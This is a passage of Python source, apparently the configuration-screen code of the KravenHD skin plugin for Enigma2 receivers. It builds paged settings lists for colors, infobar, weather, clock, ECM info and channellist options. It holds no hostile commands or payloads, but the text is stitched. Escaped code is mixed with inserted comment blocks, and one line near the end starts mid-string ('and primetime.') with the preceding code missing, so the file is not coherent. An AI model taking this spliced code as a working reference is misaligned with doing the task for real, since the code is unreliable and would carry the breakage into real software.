self.UserMenuIconsAvailable:\n\t\t\tlist.append(getConfigListEntry(_(\"Menus\"), config.plugins.KravenHD.Logo, _(\"Choose from different options to display the system menus. Press the red button for the FAQs with details on installing menu icons.\")))\n\t\t\tself.actMenustyle=config.plugins.KravenHD.Logo.value\n\t\t\tif config.plugins.KravenHD.Logo.value in (\"metrix-icons\", \"minitv-metrix-icons\"):\n\t\t\t\tlist.append(getConfigListEntry(_(\"Menu-Icons\"), config.plugins.KravenHD.MenuIcons, _(\"Choose from different icon sets for the menu screens. Many thanks to rennmaus and kleiner.teufel for their icon set.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Menus\"), config.plugins.KravenHD.LogoNoInternet, _(\"Choose from different options to display the system menus. Press the red button for the FAQs with details on installing menu icons.\")))\n\t\t\tself.actMenustyle=config.plugins.KravenHD.LogoNoInternet.value\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"Mainmenu Fontsize ('Standard' Style)\"), config.plugins.KravenHD.MainmenuFontsize, _(\"Choose the font size for 'Standard' mainmenus.\")))\n\t\tlist.append(getConfigListEntry(_(\"Mainmenu Title Color ('Horizontal' Styles)\"), config.plugins.KravenHD.MainmenuHorTitleFontList, _(\"Choose the title font color for 'Horizontal' and 'Horizontal-Icons' mainmenus.\")))\n\t\tlist.append(getConfigListEntry(_(\"Mainmenu Icons Gradient Color ('Horizontal-Icons' Style)\"), config.plugins.KravenHD.MainmenuHorIconColorList, _(\"Choose the gradient color of the icons for 'Horizontal-Icons' mainmenus.\")))\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 2\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"GLOBAL COLORS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryGlobalColors, _(\"This section offers all basic color settings.\")))\n
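\t\t# Color settings follow a *List / *Self / value triple (declared at module\n\t\t# level above): the ConfigSelection \"...List\" offers presets plus \"self\",\n\t\t# the ConfigText \"...Self\" holds a user-defined RRGGBB hex value, and a\n\t\t# plain ConfigText carries the effective color, resolved at the end of this\n\t\t# method. Sketch of the pattern (one of the actual assignments below):\n\t\t#   if config.plugins.KravenHD.SelectionBackgroundList.value == \"self\":\n\t\t#       config.plugins.KravenHD.SelectionBackground.value = config.plugins.KravenHD.SelectionBackgroundSelf.value\n\t\t#   else:\n\t\t#       config.plugins.KravenHD.SelectionBackground.value = config.plugins.KravenHD.SelectionBackgroundList.value\n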
\t\tlist.append(getConfigListEntry(_(\"Background\"), config.plugins.KravenHD.BackgroundListColor, _(\"Choose the background for all screens. You can choose from a list of predefined colors or textures, create your own color using RGB sliders or define a color gradient. Also read the FAQs regarding your own textures.\")))\n\t\tif config.plugins.KravenHD.BackgroundListColor.value == \"gradient\":\n\t\t\tlist.append(getConfigListEntry(_(\" Primary Color\"), config.plugins.KravenHD.BackgroundGradientListColorPrimary, _(\"Choose the primary color for the background gradient. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Secondary Color\"), config.plugins.KravenHD.BackgroundGradientListColorSecondary, _(\"Choose the secondary color for the background gradient. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.BackgroundListColor.value == \"texture\":\n\t\t\tlist.append(getConfigListEntry(_(\" Texture\"), config.plugins.KravenHD.BackgroundTexture, _(\"Choose the texture for the background.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Alternate Color\"), config.plugins.KravenHD.BackgroundAlternateListColor, _(\"Choose the alternate color for the background. It should match the texture as closely as possible. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telse:\n\t\t\temptyLines+=3\n\t\tlist.append(getConfigListEntry(_(\"Background-Transparency\"), config.plugins.KravenHD.BackgroundColorTrans, _(\"Choose the degree of background transparency for all screens except channellists.\")))\n\t\tlist.append(getConfigListEntry(_(\"Listselection-Style\"), config.plugins.KravenHD.SelectionStyle, _(\"Choose from different options to display selection bars.\")))\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"color\":\n\t\t\tlist.append(getConfigListEntry(_(\" Color\"), config.plugins.KravenHD.SelectionBackgroundList, _(\"Choose the background color of selection bars. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Border\"), config.plugins.KravenHD.SelectionBorderList, _(\"Choose the border color of selection bars or deactivate borders completely. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\" Primary Color\"), config.plugins.KravenHD.SelectionBackgroundList, _(\"Choose the primary background color of selection bars. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Secondary Color\"), config.plugins.KravenHD.SelectionBackground2List, _(\"Choose the secondary background color of selection bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Listselection-Font\"), config.plugins.KravenHD.SelectionFontList, _(\"Choose the color of the font in selection bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-/Volumebar\"), config.plugins.KravenHD.ProgressList, _(\"Choose the color of progress bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Border\"), config.plugins.KravenHD.BorderList, _(\"Choose the global border color. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"MiniTV-Border\"), config.plugins.KravenHD.MiniTVBorderList, _(\"Choose the border color of MiniTVs. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Lines\"), config.plugins.KravenHD.LineList, _(\"Choose the color of all lines. This affects dividers as well as the line in the center of some progress bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Primary-Font\"), config.plugins.KravenHD.Font1List, _(\"Choose the color of the primary font. 
The primary font is used for list items, textboxes and other important information. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Secondary-Font\"), config.plugins.KravenHD.Font2List, _(\"Choose the color of the secondary font. The secondary font is used for headers, labels and other additional information. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Marking-Font\"), config.plugins.KravenHD.MarkedFontList, _(\"Choose the font color of marked list items. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Colorbutton-Font\"), config.plugins.KravenHD.ButtonTextList, _(\"Choose the font color of the color button labels. Press OK to define your own RGB color.\")))\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 3\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"INFOBAR-LOOK ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryInfobarLook, _(\"This section offers all settings for the infobar look.\")))\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Style\"), config.plugins.KravenHD.InfobarStyle, _(\"Choose from different infobar styles. Please note that not every style provides every feature. Therefore some features might be unavailable for the chosen style.\")))\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Background-Style\"), config.plugins.KravenHD.IBStyle, _(\"Choose from different infobar background styles.\")))\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar-Box-Line\"), config.plugins.KravenHD.IBLineList, _(\"Choose the color of the infobar box lines. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar-Background\"), config.plugins.KravenHD.InfobarGradientListColor, _(\"Choose the background for the infobars. You can choose from a list of predefined colors or textures or create your own color using RGB sliders.\")))\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar-Background\"), config.plugins.KravenHD.InfobarBoxListColor, _(\"Choose the background for the infobars. You can choose from a list of predefined colors or textures, create your own color using RGB sliders or define a color gradient.\")))\n
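\t\t# The \"box\" and \"grad\" background styles are configured through separate\n\t\t# settings (InfobarBoxListColor vs. InfobarGradientListColor), so the\n\t\t# gradient and texture sub-entries below are gated on both the background\n\t\t# style and the selected color type.\n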
\t\tif config.plugins.KravenHD.IBStyle.value == \"box\" and config.plugins.KravenHD.InfobarBoxListColor.value == \"gradient\":\n\t\t\tlist.append(getConfigListEntry(_(\" Primary Color\"), config.plugins.KravenHD.InfobarGradientListColorPrimary, _(\"Choose the primary color for the infobar gradient. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Secondary Color\"), config.plugins.KravenHD.InfobarGradientListColorSecondary, _(\"Choose the secondary color for the infobar gradient. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Info Panels\"), config.plugins.KravenHD.InfoStyle, _(\"Choose gradient or color for the info panels (Sysinfos, Timeshiftbar etc.).\")))\n\t\telif config.plugins.KravenHD.IBStyle.value == \"box\" and config.plugins.KravenHD.InfobarBoxListColor.value == \"texture\":\n\t\t\tlist.append(getConfigListEntry(_(\" Texture\"), config.plugins.KravenHD.InfobarTexture, _(\"Choose the texture for the infobars.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Alternate Color\"), config.plugins.KravenHD.InfobarAlternateListColor, _(\"Choose the alternate color for the infobars. It should match the texture as closely as possible. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.IBStyle.value == \"grad\" and config.plugins.KravenHD.InfobarGradientListColor.value == \"texture\":\n\t\t\tlist.append(getConfigListEntry(_(\" Texture\"), config.plugins.KravenHD.InfobarTexture, _(\"Choose the texture for the infobars.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Alternate Color\"), config.plugins.KravenHD.InfobarAlternateListColor, _(\"Choose the alternate color for the infobars. It should match the texture as closely as possible. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telse:\n\t\t\temptyLines+=3\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Transparency\"), config.plugins.KravenHD.InfobarColorTrans, _(\"Choose the degree of background transparency for the infobars.\")))\n\t\tlist.append(getConfigListEntry(_(\"Primary-Infobar-Font\"), config.plugins.KravenHD.IBFont1List, _(\"Choose the color of the primary infobar font. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Secondary-Infobar-Font\"), config.plugins.KravenHD.IBFont2List, _(\"Choose the color of the secondary infobar font. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Icons\"), config.plugins.KravenHD.IconStyle, _(\"Choose between light and dark infobar icons.\")))\n\t\tlist.append(getConfigListEntry(_(\"Eventname Fontsize\"), config.plugins.KravenHD.IBFontSize, _(\"Choose the font size of the event name.\")))\n\t\tlist.append(getConfigListEntry(_(\"Eventname effect\"), config.plugins.KravenHD.TypeWriter, _(\"Choose from different effects to display the event name.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-Bar\"), config.plugins.KravenHD.IBProgressList, _(\"Choose the color of the progress bar. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-Background\"), config.plugins.KravenHD.IBProgressBackgroundList, _(\"Choose the color of the progress bar background or deactivate it completely. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-Border/Line\"), config.plugins.KravenHD.IBProgressBorderLine, _(\"Choose whether the progress bar is displayed with a border, a line, or neither.\")))\n
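\t\t# The border/line color entry only appears when a border or line style is\n\t\t# selected for the progress bar; otherwise a filler row keeps the page height.\n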
\t\tif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-border\":\n\t\t\tlist.append(getConfigListEntry(_(\"Progress-Border Color\"), config.plugins.KravenHD.IBProgressBorderLineColorList, _(\"Choose the border color of the progress bar. Press OK to define your own RGB color.\")))\n\t\telif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-line\":\n\t\t\tlist.append(getConfigListEntry(_(\"Progress-Line Color\"), config.plugins.KravenHD.IBProgressBorderLineColorList, _(\"Choose the line color of the progress bar. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 4\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"INFOBAR-CONTENTS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryInfobarContents, _(\"This section offers all settings for infobar contents.\")))\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-z1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Busy color\"), config.plugins.KravenHD.TunerBusyList, _(\"Choose the color for engaged tuners. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Active color\"), config.plugins.KravenHD.TunerLiveList, _(\"Choose the color for the current live tuner. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Record color\"), config.plugins.KravenHD.TunerRecordList, _(\"Choose the color for recording tuners. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Active record color\"), config.plugins.KravenHD.TunerXtremeBusyList, _(\"Choose the color for the current live tuner when also recording. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show unused Tuners\"), config.plugins.KravenHD.ShowUnusedTuner, _(\"Choose whether unused tuners are displayed or not.\")))\n\t\telse:\n\t\t\temptyLines+=5\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\":\n\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox2, _(\"Choose which information will be shown in the info box.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox, _(\"Choose which information will be shown in the info box.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Show AGC/SNR\"), config.plugins.KravenHD.ShowAgcSnr, _(\"Choose whether AGC/SNR are displayed or not.\")))\n\t\t\tif config.plugins.KravenHD.ShowAgcSnr.value == \"on\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox2, _(\"Choose which information will be shown in the info box.\")))\n\t\t\telse:\n\t\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox, _(\"Choose which information will be shown in the info box.\")))\n\t\telse:\n\t\t\temptyLines+=2\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\", \"infobar-style-zz1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number\"), config.plugins.KravenHD.InfobarChannelName, _(\"Choose from different options to show the channel name and number in the infobar.\")))\n\t\t\tif not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number-Font\"), config.plugins.KravenHD.ChannelnameFontList, _(\"Choose the font color of channel name and number. 
Press OK to define your own RGB color.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number\"), config.plugins.KravenHD.InfobarChannelName2, _(\"Choose from different options to show the channel name and number in the infobar.\")))\n\t\t\tif not config.plugins.KravenHD.InfobarChannelName2.value == \"none\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number-Font\"), config.plugins.KravenHD.ChannelnameFontList, _(\"Choose the font color of channel name and number. Press OK to define your own RGB color.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"System-Infos\"), config.plugins.KravenHD.SystemInfo, _(\"Choose from different additional windows with system information or deactivate them completely.\")))\n\t\tfor i in range(emptyLines+7):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 5\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"WEATHER ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryWeather, _(\"This section offers all weather settings.\")))\n\t\tif self.InternetAvailable:\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x3\", \"infobar-style-z2\", \"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyle, _(\"Choose from different options to show the weather in the infobar.\")))\n\t\t\t\tself.actWeatherstyle=config.plugins.KravenHD.WeatherStyle.value\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/Netatmo/plugin.py\"):\n\t\t\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyle3, _(\"Activate or deactivate displaying the weather in the infobar.\")))\n\t\t\t\t\tself.actWeatherstyle=config.plugins.KravenHD.WeatherStyle3.value\n\t\t\t\telse:\n\t\t\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyle2, _(\"Activate or deactivate displaying the weather in the infobar.\")))\n\t\t\t\t\tself.actWeatherstyle=config.plugins.KravenHD.WeatherStyle2.value\n\t\t\tlist.append(getConfigListEntry(_(\"Search option\"), config.plugins.KravenHD.msn_searchby, _(\"Choose from different options to enter your settings.\\nPress the red button to search for the weather code.\")))\n\t\t\tif config.plugins.KravenHD.msn_searchby.value == \"location\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Location \"), config.plugins.KravenHD.msn_cityname, _(\"Enter your location.\\nPress OK to use the virtual keyboard.\\nPress the red button to search for the weather code.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\t\tlist.append(getConfigListEntry(_(\"Language\"), config.plugins.KravenHD.msn_language, _(\"Specify the language for the weather output.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Refresh interval (in minutes)\"), config.plugins.KravenHD.refreshInterval, _(\"Choose the frequency of loading weather data from the internet.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Weather-Style\"), config.plugins.KravenHD.WeatherView, _(\"Choose between graphical weather symbols and Meteo symbols.\")))\n
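\t\t\t# The weather entries (and the clock section below) depend on\n\t\t\t# self.InternetAvailable, probed once in __init__; without a connection\n\t\t\t# only the reduced *NoInternet variants are offered.\n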
\t\t\tif config.plugins.KravenHD.WeatherView.value == \"meteo\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Meteo-Color\"), config.plugins.KravenHD.MeteoColor, _(\"Choose between light and dark Meteo symbols.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyleNoInternet, _(\"You have no internet connection. This function is disabled.\")))\n\t\t\tself.actWeatherstyle=\"none\"\n\t\t\temptyLines+=6\n\t\tfor i in range(emptyLines+3):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 5 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"CLOCK ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryClock, _(\"This section offers all settings for the different clocks.\")))\n\t\tif self.InternetAvailable:\n\t\t\tlist.append(getConfigListEntry(_(\"Clock-Style\"), config.plugins.KravenHD.ClockStyle, _(\"Choose from different options to show the clock in the infobar.\")))\n\t\t\tself.actClockstyle=config.plugins.KravenHD.ClockStyle.value\n\t\t\tif self.actClockstyle == \"clock-analog\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Analog-Clock-Color\"), config.plugins.KravenHD.AnalogColorList, _(\"Choose from different colors for the analog type clock in the infobar.\")))\n\t\t\telif self.actClockstyle == \"clock-android\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Android-Temp-Color\"), config.plugins.KravenHD.AndroidList, _(\"Choose the font color of the android-clock temperature. Press OK to define your own RGB color.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Clock-Style\"), config.plugins.KravenHD.ClockStyleNoInternet, _(\"Choose from different options to show the clock in the infobar.\")))\n\t\t\tself.actClockstyle=config.plugins.KravenHD.ClockStyleNoInternet.value\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines+4):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 6\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"ECM INFOS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryECMInfos, _(\"This section offers all settings for showing the decryption info.\")))\n\t\tlist.append(getConfigListEntry(_(\"Show ECM Infos\"), config.plugins.KravenHD.ECMVisible, _(\"Choose from different options where to display the ECM information.\")))\n
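\t\t# How much ECM detail is on offer depends on the infobar style: the x1\n\t\t# style only gets the short variants (ECMLine1), the nopicon/x/z styles go\n\t\t# up to 'complete' (ECMLine2), and the zz/zzz styles up to 'extensive'\n\t\t# (ECMLine3).\n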
\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\" and not config.plugins.KravenHD.ECMVisible.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLine1, _(\"Choose from different options to display the ECM information.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show 'free to air'\"), config.plugins.KravenHD.FTA, _(\"Choose whether 'free to air' is displayed or not for unencrypted channels.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM-Font\"), config.plugins.KravenHD.ECMFontList, _(\"Choose the font color of the ECM information. Press OK to define your own RGB color.\")))\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\") and not config.plugins.KravenHD.ECMVisible.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLine2, _(\"Choose from different options to display the ECM information.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show 'free to air'\"), config.plugins.KravenHD.FTA, _(\"Choose whether 'free to air' is displayed or not for unencrypted channels.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM-Font\"), config.plugins.KravenHD.ECMFontList, _(\"Choose the font color of the ECM information. Press OK to define your own RGB color.\")))\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\") and not config.plugins.KravenHD.ECMVisible.value == \"none\":\n\t\t\tlist.append(getConfigListEntry(_(\"ECM Infos\"), config.plugins.KravenHD.ECMLine3, _(\"Choose from different options to display the ECM information.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show 'free to air'\"), config.plugins.KravenHD.FTA, _(\"Choose whether 'free to air' is displayed or not for unencrypted channels.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"ECM-Font\"), config.plugins.KravenHD.ECMFontList, _(\"Choose the font color of the ECM information. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=3\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 6 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"VIEWS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryViews, _(\"This section offers all settings for skinned plugins.\")))\n\t\tlist.append(getConfigListEntry(_(\"Volume\"), config.plugins.KravenHD.Volume, _(\"Choose from different styles for the volume display.\")))\n\t\tlist.append(getConfigListEntry(_(\"SecondInfobar\"), config.plugins.KravenHD.SIB, _(\"Choose from different styles for SecondInfobar. \\nActivate the SecondInfobar in the \\nOSD settings. \\n2nd infobar -> 2nd Infobar INFO\")))\n\t\tlist.append(getConfigListEntry(_(\"CoolTVGuide\"), config.plugins.KravenHD.CoolTVGuide, _(\"Choose from different styles for CoolTVGuide.\")))\n\t\tlist.append(getConfigListEntry(_(\"MovieSelection\"), config.plugins.KravenHD.MovieSelection, _(\"Choose from different styles for MovieSelection.\")))\n\t\tlist.append(getConfigListEntry(_(\"EPGSelection\"), config.plugins.KravenHD.EPGSelection, _(\"Choose from different styles to display EPGSelection.\")))\n\t\tlist.append(getConfigListEntry(_(\"SerienRecorder\"), config.plugins.KravenHD.SerienRecorder, _(\"Choose whether you want the Kraven skin to be applied to 'Serienrecorder' or not. Activating this option disables the skin selection in the SR plugin.\")))\n
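\t\t# Skins for third-party plugins are only offered when the plugin is\n\t\t# actually installed (fileExists check on its plugin.py).\n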
\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\"):\n\t\t\tlist.append(getConfigListEntry(_(\"MediaPortal\"), config.plugins.KravenHD.MediaPortal, _(\"Choose whether you want the Kraven skin to be applied to 'MediaPortal' or not. To remove it again, you must deactivate it here and activate another skin in 'MediaPortal'.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"FileCommander\"), config.plugins.KravenHD.FileCommander, _(\"Choose from different styles to display FileCommander.\")))\n\t\tlist.append(getConfigListEntry(_(\"Popups\"), config.plugins.KravenHD.PopupStyle, _(\"Choose from different styles to display popups like 'MessageBox', 'ChoiceBox', 'ExtensionsList', 'VirtualKeyboard' and more.\")))\n\t\tlist.append(getConfigListEntry(_(\"PermanentClock-Color\"), config.plugins.KravenHD.PermanentClock, _(\"Choose the colors of PermanentClock.\")))\n\t\tif config.plugins.KravenHD.PermanentClock.value in (\"permanentclock-transparent-big\", \"permanentclock-transparent-small\"):\n\t\t\tlist.append(getConfigListEntry(_(\"PermanentClock-Font\"), config.plugins.KravenHD.PermanentClockFontList, _(\"Choose the font color of PermanentClock. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 7\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"CHANNELLIST ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryChannellist, _(\"This section offers all channellist settings.\")))\n\t\tif SystemInfo.get(\"NumVideoDecoders\", 1) > 1:\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Style\"), config.plugins.KravenHD.ChannelSelectionStyle2, _(\"Choose from different styles for the channel selection screen.\")))\n\t\t\tself.actChannelselectionstyle=config.plugins.KravenHD.ChannelSelectionStyle2.value\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Style\"), config.plugins.KravenHD.ChannelSelectionStyle, _(\"Choose from different styles for the channel selection screen.\")))\n\t\t\tself.actChannelselectionstyle=config.plugins.KravenHD.ChannelSelectionStyle.value\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-minitv\", \"channelselection-style-minitv2\", \"channelselection-style-minitv22\", \"channelselection-style-minitv33\", \"channelselection-style-minitv4\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv33\", \"channelselection-style-minitv-picon\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Mode\"), config.plugins.KravenHD.ChannelSelectionMode, _(\"Choose between direct zapping (1xOK) and zapping after preview (2xOK).\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tif not self.actChannelselectionstyle in (\"channelselection-style-minitv\", \"channelselection-style-minitv2\", \"channelselection-style-minitv3\", \"channelselection-style-minitv4\", \"channelselection-style-minitv22\", \"channelselection-style-nobile-minitv\", \"channelselection-style-nobile-minitv3\", \"channelselection-style-minitv-picon\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Channellist-Transparency\"), config.plugins.KravenHD.ChannelSelectionTrans, _(\"Choose the degree of background transparency for the channellists.\")))\n\t\telse:\n\t\t\temptyLines+=1\n
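\t\t# Boxes reporting more than one video decoder (SystemInfo \"NumVideoDecoders\",\n\t\t# checked above) get the extended style list including the Dual TV modes;\n\t\t# the chosen style is kept in self.actChannelselectionstyle and drives the\n\t\t# dependent entries below.\n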
and primetime.\")))\n\t\telif self.actChannelselectionstyle == \"channelselection-style-minitv22\":\n\t\t\tlist.append(getConfigListEntry(_(\"EPG Fontsize\"), config.plugins.KravenHD.ChannelSelectionEPGSize2, _(\"Choose the font size of EPG list and primetime.\")))\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"EPG Fontsize\"), config.plugins.KravenHD.ChannelSelectionEPGSize3, _(\"Choose the font size of event description, EPG list and primetime.\")))\n\t\tlist.append(getConfigListEntry(_(\"'Not available'-Font\"), config.plugins.KravenHD.ChannelSelectionServiceNAList, _(\"Choose the font color of channels that are unavailable at the moment. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Primetime\"), config.plugins.KravenHD.Primetimeavailable, _(\"Choose whether primetime program information is displayed or not.\")))\n\t\tif config.plugins.KravenHD.Primetimeavailable.value == \"primetime-on\":\n\t\t\tlist.append(getConfigListEntry(_(\"Primetime-Time\"), 